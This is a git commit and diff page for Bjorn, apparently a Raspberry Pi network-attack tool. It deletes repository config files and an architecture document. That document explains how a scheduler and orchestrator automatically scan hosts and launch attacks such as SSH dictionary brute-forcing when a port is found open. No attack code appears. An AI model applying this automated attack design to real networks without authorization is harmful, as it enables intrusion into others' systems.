5 Commits

Author SHA1 Message Date
infinition
3fa4d5742a Update BluetoothUtils: enhance scanning duration, improve service checks, and add adapter reset functionality 2026-03-16 22:09:51 +01:00
infinition
df83cd2e92 Add notifier configuration management for Sentinel and LLM 2026-03-16 21:54:31 +01:00
infinition
b759ab6d4b Add LLM configuration and MCP server management UI and backend functionality
- Implemented a new SPA page for LLM Bridge and MCP Server settings in `llm-config.js`.
- Added functionality for managing LLM and MCP configurations, including toggling, saving settings, and testing connections.
- Created HTTP endpoints in `llm_utils.py` for handling LLM chat, status checks, and MCP server configuration.
- Integrated model fetching from LaRuche and Ollama backends.
- Enhanced error handling and logging for better debugging and user feedback.
2026-03-16 20:33:22 +01:00
infinition
aac77a3e76 Add Loki and Sentinel utility classes for web API endpoints
- Implemented LokiUtils class with GET and POST endpoints for managing scripts, jobs, and payloads.
- Added SentinelUtils class with GET and POST endpoints for managing events, rules, devices, and notifications.
- Both classes include error handling and JSON response formatting.
2026-03-14 22:33:10 +01:00
Fabien POLLY
eb20b168a6 Add RLUtils class for managing RL/AI dashboard endpoints
- Implemented methods for fetching AI stats, training history, and recent experiences.
- Added functionality to set operation mode (MANUAL, AUTO, AI) with appropriate handling.
- Included helper methods for querying the database and sending JSON responses.
- Integrated model metadata extraction for visualization purposes.
2026-02-18 22:36:10 +01:00
338 changed files with 79722 additions and 28454 deletions

.gitattributes

@@ -1,2 +0,0 @@
*.sh text eol=lf
*.py text eol=lf

.github/FUNDING.yml

@@ -1,15 +0,0 @@
# These are supported funding model platforms
#github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
#patreon: # Replace with a single Patreon username
#open_collective: # Replace with a single Open Collective username
#ko_fi: # Replace with a single Ko-fi username
#tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
#community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
#liberapay: # Replace with a single Liberapay username
#issuehunt: # Replace with a single IssueHunt username
#lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
#polar: # Replace with a single Polar username
buy_me_a_coffee: infinition
#thanks_dev: # Replace with a single thanks.dev username
#custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']


@@ -1,34 +0,0 @@
---
name: Bug report
about: Create a report to help us improve
title: ""
labels: ""
assignees: ""
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Hardware (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.


@@ -1,11 +0,0 @@
---
# .github/ISSUE_TEMPLATE/config.yml
blank_issues_enabled: false
contact_links:
- name: Bjorn Community Support
url: https://github.com/infinition/bjorn/discussions
about: Please ask and answer questions here.
- name: Bjorn Security Reports
url: https://infinition.github.io/bjorn/SECURITY
about: Please report security vulnerabilities here.


@@ -1,19 +0,0 @@
---
name: Feature request
about: Suggest an idea for this project
title: ""
labels: ""
assignees: ""
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.


@@ -1,12 +0,0 @@
# .github/dependabot.yml
version: 2
updates:
- package-ecosystem: "pip"
directory: "."
schedule:
interval: "weekly"
commit-message:
prefix: "fix(deps)"
open-pull-requests-limit: 5
target-branch: "dev"

.gitignore

@@ -1,137 +0,0 @@
# Node.js / npm
node_modules/
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.pnpm-debug.log*
package-lock.json*
# TypeScript / TSX
dist/
*.tsbuildinfo
# Poetry
poetry.lock
# Environment variables
.env
.env.*.local
# Logs
logs
*.log
pnpm-debug.log*
lerna-debug.log*
# Dependency directories
jspm_packages/
# Optional npm cache directory
.npm
# Output of 'npm pack'
*.tgz
# Lockfiles
yarn.lock
.pnpm-lock.yaml
# Optional eslint cache
.eslintcache
# Optional stylelint cache
.stylelintcache
# Optional REPL history
.node_repl_history
# Coverage directories used by tools like istanbul or jest
coverage/
# Output of 'tsc' command
out/
build/
tmp/
temp/
# Python
__pycache__/
*.py[cod]
*.so
*.egg
*.egg-info/
pip-wheel-metadata/
*.pyo
*.pyd
*.whl
*.pytest_cache/
.tox/
env/
venv
venv/
ENV/
env.bak/
.venv/
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# Coverage reports
htmlcov/
.coverage
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
# Jupyter Notebook
.ipynb_checkpoints
# Django stuff:
staticfiles/
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# VS Code settings
.vscode/
.idea/
# macOS files
.DS_Store
.AppleDouble
.LSOverride
# Windows files
Thumbs.db
ehthumbs.db
Desktop.ini
$RECYCLE.BIN/
# Linux system files
*.swp
*~
# IDE specific
*.iml
*.suo
*.ntvs*
*.njsproj
*.sln
*.sw?
scripts
*/certs/

.pylintrc

@@ -1,652 +0,0 @@
[MAIN]
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Clear in-memory caches upon conclusion of linting. Useful if running pylint
# in a server-like mode.
clear-cache-post-run=no
# Load and enable all available extensions. Use --list-extensions to see a list
# all available extensions.
#enable-all-extensions=
# In error mode, messages with a category besides ERROR or FATAL are
# suppressed, and no reports are done by default. Error mode is compatible with
# disabling specific errors.
#errors-only=
# Always return a 0 (non-error) status code, even if lint errors are found.
# This is primarily useful in continuous integration scripts.
#exit-zero=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code.
extension-pkg-allow-list=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code. (This is an alternative name to extension-pkg-allow-list
# for backward compatibility.)
extension-pkg-whitelist=
# Return non-zero exit code if any of these messages/categories are detected,
# even if score is above --fail-under value. Syntax same as enable. Messages
# specified are enabled, while categories only check already-enabled messages.
fail-on=
# Specify a score threshold under which the program will exit with error.
fail-under=8
# Interpret the stdin as a python script, whose filename needs to be passed as
# the module_or_package argument.
#from-stdin=
# Files or directories to be skipped. They should be base names, not paths.
ignore=venv,node_modules,scripts
# Add files or directories matching the regular expressions patterns to the
# ignore-list. The regex matches against paths and can be in Posix or Windows
# format. Because '\\' represents the directory delimiter on Windows systems,
# it can't be used as an escape character.
ignore-paths=
# Files or directories matching the regular expression patterns are skipped.
# The regex matches against base names, not paths. The default value ignores
# Emacs file locks
ignore-patterns=^\.#
# List of module names for which member attributes should not be checked and
# will not be imported (useful for modules/projects where namespaces are
# manipulated during runtime and thus existing member attributes cannot be
# deduced by static analysis). It supports qualified module names, as well as
# Unix pattern matching.
ignored-modules=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use, and will cap the count on Windows to
# avoid hangs.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Resolve imports to .pyi stubs if available. May reduce no-member messages and
# increase not-an-iterable messages.
prefer-stubs=no
# Minimum Python version to use for version dependent checks. Will default to
# the version used to run pylint.
py-version=3.12
# Discover python modules and packages in the file system subtree.
recursive=no
# Add paths to the list of the source roots. Supports globbing patterns. The
# source root is an absolute path or a path relative to the current working
# directory used to determine a package namespace for modules located under the
# source root.
source-roots=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
# In verbose mode, extra non-checker-related info will be displayed.
#verbose=
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style. If left empty, argument names will be checked with the set
# naming style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style. If left empty, attribute names will be checked with the set naming
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Bad variable names regexes, separated by a comma. If names match any regex,
# they will always be refused
bad-names-rgxs=
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style. If left empty, class attribute names will be checked
# with the set naming style.
#class-attribute-rgx=
# Naming style matching correct class constant names.
class-const-naming-style=UPPER_CASE
# Regular expression matching correct class constant names. Overrides class-
# const-naming-style. If left empty, class constant names will be checked with
# the set naming style.
#class-const-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style. If left empty, class names will be checked with the set naming style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style. If left empty, constant names will be checked with the set naming
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style. If left empty, function names will be checked with the set
# naming style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Good variable names regexes, separated by a comma. If names match any regex,
# they will always be accepted
good-names-rgxs=
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style. If left empty, inline iteration names will be checked
# with the set naming style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style. If left empty, method names will be checked with the set naming style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style. If left empty, module names will be checked with the set naming style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Regular expression matching correct type alias names. If left empty, type
# alias names will be checked with the set naming style.
#typealias-rgx=
# Regular expression matching correct type variable names. If left empty, type
# variable names will be checked with the set naming style.
#typevar-rgx=
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style. If left empty, variable names will be checked with the set
# naming style.
variable-rgx=[a-z_][a-z0-9_]{2,30}$
[CLASSES]
# Warn about protected attribute access inside special methods
check-protected-access-in-special-methods=no
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
asyncSetUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,_fields,_replace,_source,_make,os._exit
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=mcs
[DESIGN]
# List of regular expressions of class ancestor names to ignore when counting
# public methods (see R0903)
exclude-too-few-public-methods=
# List of qualified class names to ignore when counting class parents (see
# R0901)
ignored-parents=
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of positional arguments for function / method.
max-positional-arguments=5
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when caught.
overgeneral-exceptions=builtins.BaseException,builtins.Exception
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=100
# Maximum number of lines in a module.
max-module-lines=2500
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow explicit reexports by alias from a package __init__.
allow-reexport-from-package=no
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=
# Output a graph (.gv or any supported image format) of external dependencies
# to the given file (report RP0402 must not be disabled).
ext-import-graph=
# Output a graph (.gv or any supported image format) of all (i.e. internal and
# external) dependencies to the given file (report RP0402 must not be
# disabled).
import-graph=
# Output a graph (.gv or any supported image format) of internal dependencies
# to the given file (report RP0402 must not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[LOGGING]
# The type of string formatting that logging methods do. `old` means using %
# formatting, `new` is for `{}` formatting.
logging-format-style=new
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, CONTROL_FLOW, INFERENCE, INFERENCE_FAILURE,
# UNDEFINED.
confidence=HIGH,
CONTROL_FLOW,
INFERENCE,
INFERENCE_FAILURE,
UNDEFINED
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then re-enable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=missing-module-docstring,
invalid-name,
too-few-public-methods,
E1101,
C0115,
duplicate-code,
raise-missing-from,
wrong-import-order,
ungrouped-imports,
reimported,
too-many-locals,
missing-timeout,
broad-exception-caught,
broad-exception-raised,
line-too-long
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
#enable=
[METHOD_ARGS]
# List of qualified names (i.e., library.method) which require a timeout
# parameter e.g. 'requests.api.get,requests.api.post'
timeout-methods=requests.api.delete,requests.api.get,requests.api.head,requests.api.options,requests.api.patch,requests.api.post,requests.api.put,requests.api.request
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
# Regular expression of note tags to take in consideration.
notes-rgx=
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit,argparse.parse_error
# Let 'consider-using-join' be raised when the separator to join on would be
# non-empty (resulting in expected fixes of the type: ``"- " + " -
# ".join(items)``)
suggest-join-with-non-empty-separator=yes
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'fatal', 'error', 'warning', 'refactor',
# 'convention', and 'info' which contain the number of messages in each
# category, as well as 'statement' which is the total number of statements
# analyzed. This score is used by the global evaluation report (RP0004).
evaluation=max(0, 0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10))
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
msg-template=
# Set the output format. Available formats are: text, parseable, colorized,
# json2 (improved json format), json (old json format) and msvs (visual
# studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
#output-format=
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[SIMILARITIES]
# Comments are removed from the similarity computation
ignore-comments=yes
# Docstrings are removed from the similarity computation
ignore-docstrings=yes
# Imports are removed from the similarity computation
ignore-imports=yes
# Signatures are removed from the similarity computation
ignore-signatures=yes
# Minimum lines number of a similarity.
min-similarity-lines=4
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. No available dictionaries : You need to install
# both the python package and the system dependency for enchant to work.
spelling-dict=
# List of comma separated words that should be considered directives if they
# appear at the beginning of a comment and should not be checked.
spelling-ignore-comment-directives=fmt: on,fmt: off,noqa:,noqa,nosec,isort:skip,mypy:
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[STRING]
# This flag controls whether inconsistent-quotes generates a warning when the
# character used as a quote delimiter is used inconsistently within a module.
check-quote-consistency=no
# This flag controls whether the implicit-str-concat should generate a warning
# on implicit string concatenation in sequences defined over several lines.
check-str-concat-over-line-jumps=no
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of symbolic message names to ignore for Mixin members.
ignored-checks-for-mixins=no-member,
not-async-context-manager,
not-context-manager,
attribute-defined-outside-init
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local,argparse.Namespace
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# Regex pattern to define which classes are considered mixins.
mixin-class-rgx=.*[Mm]ixin
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of names allowed to shadow builtins
allowed-redefined-builtins=
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
# Argument names that match this expression will be ignored.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io


@@ -1,148 +0,0 @@
# Bjorn Cyberviking Architecture
This document describes the internal workings of **Bjorn Cyberviking**.
> The architecture is designed to be **modular and asynchronous**, using multi-threading to handle the display, web interface, and cyber-security operations (scanning, attacks) simultaneously.
-----
## 1. High-Level Overview
The system relies on a **"Producer-Consumer"** model orchestrated around shared memory and a central database.
### System Data Flow
* **User / WebUI**: Interacts with the `WebApp`, which uses `WebUtils` to read/write to the **SQLite DB**.
* **Kernel (Main Thread)**: `Bjorn.py` initializes the `SharedData` (global state in RAM).
* **Brain (Logic)**:
* **Scheduler**: Plans actions based on triggers and writes them to the DB.
* **Orchestrator**: Reads the queue from the DB, executes scripts from `/actions`, and updates results in the DB.
* **Output (Display)**: `Display.py` reads the current state from `SharedData` and renders it to the E-Paper Screen.
-----
## 2. Core Components
### 2.1. The Entry Point (`Bjorn.py`)
This is the global conductor.
* **Role**: Initializes components, manages the application lifecycle, and handles stop signals.
* **Workflow**:
1. Loads configuration via `SharedData`.
2. Starts the display thread (`Display`).
3. Starts the web server thread (`WebApp`).
4. **Network Monitor**: As soon as an interface (Wi-Fi/Eth) is active, it starts the **Orchestrator** thread (automatic mode). If the network drops, it can pause the orchestrator.
### 2.2. Central Memory (`shared.py`)
This is the backbone of the program.
* **Role**: Stores the global state of Bjorn, accessible by all threads.
* **Content**:
* **Configuration**: Loaded from the DB (`config`).
* **Runtime State**: Current status (`IDLE`, `SCANNING`...), displayed text, indicators (wifi, bluetooth, battery).
* **Resources**: File paths, fonts, images loaded into RAM.
* **Singleton DB**: A unique instance of `BjornDatabase` to avoid access conflicts.
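As a sketch, a shared-state singleton of this kind could look like the following (class and attribute names here are illustrative, not the actual `shared.py` API):

```python
import threading

class SharedData:
    """Illustrative thread-safe global state holder (hypothetical names)."""
    _instance = None
    _lock = threading.Lock()

    def __new__(cls):
        # Singleton: every thread that constructs SharedData gets the same object.
        with cls._lock:
            if cls._instance is None:
                cls._instance = super().__new__(cls)
                cls._instance.status = "IDLE"
                cls._instance.indicators = {"wifi": False, "bluetooth": False}
            return cls._instance

    def set_status(self, status):
        # Writes go through the lock so display/web/orchestrator threads don't race.
        with self._lock:
            self.status = status

shared = SharedData()
shared.set_status("SCANNING")
assert SharedData() is shared  # same instance everywhere
```

The same pattern would cover the DB handle: one `BjornDatabase` instance stored on the singleton, so all threads funnel through a single connection owner.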
### 2.3. Persistent Storage (`database.py`)
A facade (wrapper) for **SQLite**.
* **Architecture**: Delegates specific operations to sub-modules (in `db_utils/`) to keep the code clean (e.g., `HostOps`, `QueueOps`, `VulnerabilityOps`).
* **Role**: Ensures persistence of discovered hosts, vulnerabilities, the action queue, and logs.
-----
## 3. The Operational Core: Scheduler vs Orchestrator
This is where Bjorn's "intelligence" lies. The system separates **decision** from **action**.
### 3.1. The Scheduler (`action_scheduler.py`)
*It "thinks" but does not act.*
* **Role**: Analyzes the environment and populates the queue (`action_queue`).
* **Logic**:
* It loops regularly to check **Triggers** defined in actions (e.g., `on_new_host`, `on_open_port:80`, `on_interval:600`).
* If a condition is met (e.g., a new PC is discovered), it inserts the corresponding action into the database with the status `pending`.
* It manages priorities and avoids duplicates.
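The trigger-matching pass above can be sketched as follows (the data shapes, trigger strings, and function name are hypothetical, not the real `action_scheduler.py` interface):

```python
# Hypothetical sketch of one scheduler cycle: match environment events
# against declared action triggers and enqueue each match exactly once.
def schedule_pending(actions, events, queue):
    for event in events:                      # e.g. "on_open_port:22"
        for action in actions:
            if event in action["triggers"]:
                entry = (action["name"], event)
                if entry not in queue:        # de-duplicate before queueing
                    queue.append(entry)
    return queue

actions = [{"name": "SSHBruteforce", "triggers": ["on_open_port:22"]}]
queue = schedule_pending(actions, ["on_open_port:22", "on_open_port:80"], [])
# queue now holds only the SSH match; port 80 had no registered trigger
```

In the real system the queue would be the `action_queue` table with a `pending` status rather than an in-memory list.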
### 3.2. The Orchestrator (`orchestrator.py`)
*It acts but does not deliberate on strategic consequences.*
* **Role**: Consumes the queue.
* **Logic**:
1. Requests the next priority action (`pending`) from the DB.
2. Dynamically loads the corresponding Python module from the `/actions` folder (via `importlib`).
3. Executes the `run()` or `execute()` method of the action.
4. Updates the result (`success`/`failed`) in the DB.
5. Updates the status displayed on the screen (via `SharedData`).
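The dynamic loading in step 2 can be sketched with `importlib` (the helper name and the throwaway demo file are illustrative, not the actual orchestrator code):

```python
import importlib.util
import pathlib
import tempfile
import textwrap

def load_action(path):
    """Load an action module from a file path, as an /actions plugin loader might."""
    spec = importlib.util.spec_from_file_location(pathlib.Path(path).stem, str(path))
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)
    return module

# Demo with a temporary file standing in for an /actions/<name>.py module.
with tempfile.TemporaryDirectory() as d:
    action_file = pathlib.Path(d) / "demo_action.py"
    action_file.write_text(textwrap.dedent("""\
        def run(target):
            return "scanned " + target
        """))
    mod = load_action(action_file)
    result = mod.run("192.168.1.50")
assert result == "scanned 192.168.1.50"
```

Loading by file path rather than by package import is what lets new action scripts be dropped into `/actions` without restarting or reinstalling anything.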
-----
## 4. User Interface
### 4.1. E-Ink Display (`display.py` & `epd_manager.py`)
* **EPD Manager**: `epd_manager.py` is a singleton handling low-level hardware access (SPI) to prevent conflicts and manage hardware timeouts.
* **Rendering**: `display.py` constructs the image in memory (**PIL**) by assembling:
* Bjorn's face (based on current status).
* Statistics (skulls, lightning bolts, coins).
* The "catchphrase" (generated by `comment.py`).
* **Optimization**: Uses partial refresh to avoid black/white flashing, except for periodic maintenance.
### 4.2. Web Interface (`webapp.py`)
* **Server**: A custom multi-threaded `http.server` (no heavy frameworks like Flask or Django, to keep the footprint small).
* **Architecture**:
* API requests are dynamically routed to `WebUtils` (`utils.py`).
* The frontend communicates primarily in **JSON**.
* Handles authentication and GZIP compression of assets.
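A minimal sketch of a framework-free JSON API on the standard-library `http.server`, in the spirit described above (the route table, handler class, and endpoint path are hypothetical, not the actual `webapp.py` routes):

```python
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Illustrative route table: path -> callable returning a JSON-serializable dict.
ROUTES = {
    "/api/status": lambda: {"status": "IDLE"},
}

class ApiHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        handler = ROUTES.get(self.path)
        if handler is None:
            self.send_error(404)
            return
        body = json.dumps(handler()).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

# Demo: bind an ephemeral port, serve from a thread, fetch one response.
server = ThreadingHTTPServer(("127.0.0.1", 0), ApiHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()
port = server.server_address[1]
with urllib.request.urlopen(f"http://127.0.0.1:{port}/api/status") as resp:
    data = json.loads(resp.read())
server.shutdown()
```

A dispatch table like this is the whole trade-off: no middleware or templating, just path lookup and JSON, which suits a Pi Zero's RAM budget.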
### 4.3. The Commentator (`comment.py`)
Provides Bjorn's personality. It selects phrases from the database based on context (e.g., *"Bruteforcing SSH..."*) and the configured language, with a weighting and delay system to avoid spamming.
-----
## 5. Typical Data Flow (Example)
Here is what happens when Bjorn identifies a vulnerable service:
1. **Scanning (Action)**: The Orchestrator executes a scan. It discovers IP `192.168.1.50` has **port 22 (SSH) open**.
2. **Storage**: The scanner saves the host and port status to the DB.
3. **Reaction (Scheduler)**: In the next cycle, the `ActionScheduler` detects the open port. It checks actions that have the `on_open_port:22` trigger.
4. **Planning**: It adds the `SSHBruteforce` action to the `action_queue` for this IP.
5. **Execution (Orchestrator)**: The Orchestrator finishes its current task, sees the `SSHBruteforce` in the queue, picks it up, and starts the dictionary attack.
6. **Feedback (Display)**: `SharedData` is updated. The screen displays *"Cracking 192.168.1.50"* with the corresponding face.
7. **Web**: The user sees the attack attempt and real-time logs on the web dashboard.
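With illustrative table, column, and action names (not the real schema), steps 2 to 4 of this flow reduce to:

```python
import sqlite3

# Hypothetical sketch of the scan -> store -> react chain for port 22.
# Table names, columns, and the action name are illustrative only.
def record_open_port(db, ip, port):
    """Step 2: the scanner persists the discovered open port."""
    db.execute(
        "INSERT INTO hosts (ip, port, state) VALUES (?, ?, 'open')",
        (ip, port),
    )

def scheduler_pass(db):
    """Steps 3-4: react to open port 22 by queueing SSHBruteforce."""
    for (ip,) in db.execute(
        "SELECT ip FROM hosts WHERE port=22 AND state='open'"
    ).fetchall():
        db.execute(
            "INSERT INTO action_queue (action, target, status) "
            "VALUES ('SSHBruteforce', ?, 'pending')",
            (ip,),
        )
```

A real scheduler would also dedupe and prioritise here, as section 3.1 notes; this sketch only shows the trigger-to-queue chain.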
-----
## 6\. Folder Structure
Although not provided here, the architecture implies this structure:
```text
/
├── Bjorn.py # Root program entry
├── orchestrator.py # Action consumer
├── shared.py # Shared memory
├── actions/ # Python modules containing attack/scan logic (dynamically loaded)
├── data/ # Stores bjorn.db and logs
├── web/ # HTML/JS/CSS files for the interface
└── resources/ # Images, fonts (.bmp, .ttf)
```
-----
Bjorn.py
@@ -1,173 +1,713 @@
# bjorn.py
import threading
import signal
# Bjorn.py
# Main entry point and supervisor for the Bjorn project
# Manages lifecycle of threads, health monitoring, and crash protection.
# OPTIMIZED FOR PI ZERO 2: Low CPU overhead, aggressive RAM management.
import logging
import time
import sys
import os
import signal
import subprocess
import re
from init_shared import shared_data
from display import Display, handle_exit_display
import sys
import threading
import time
import gc
import tracemalloc
import atexit
from comment import Commentaireia
from webapp import web_thread, handle_exit_web
from orchestrator import Orchestrator
from display import Display, handle_exit_display
from init_shared import shared_data
from logger import Logger
from orchestrator import Orchestrator
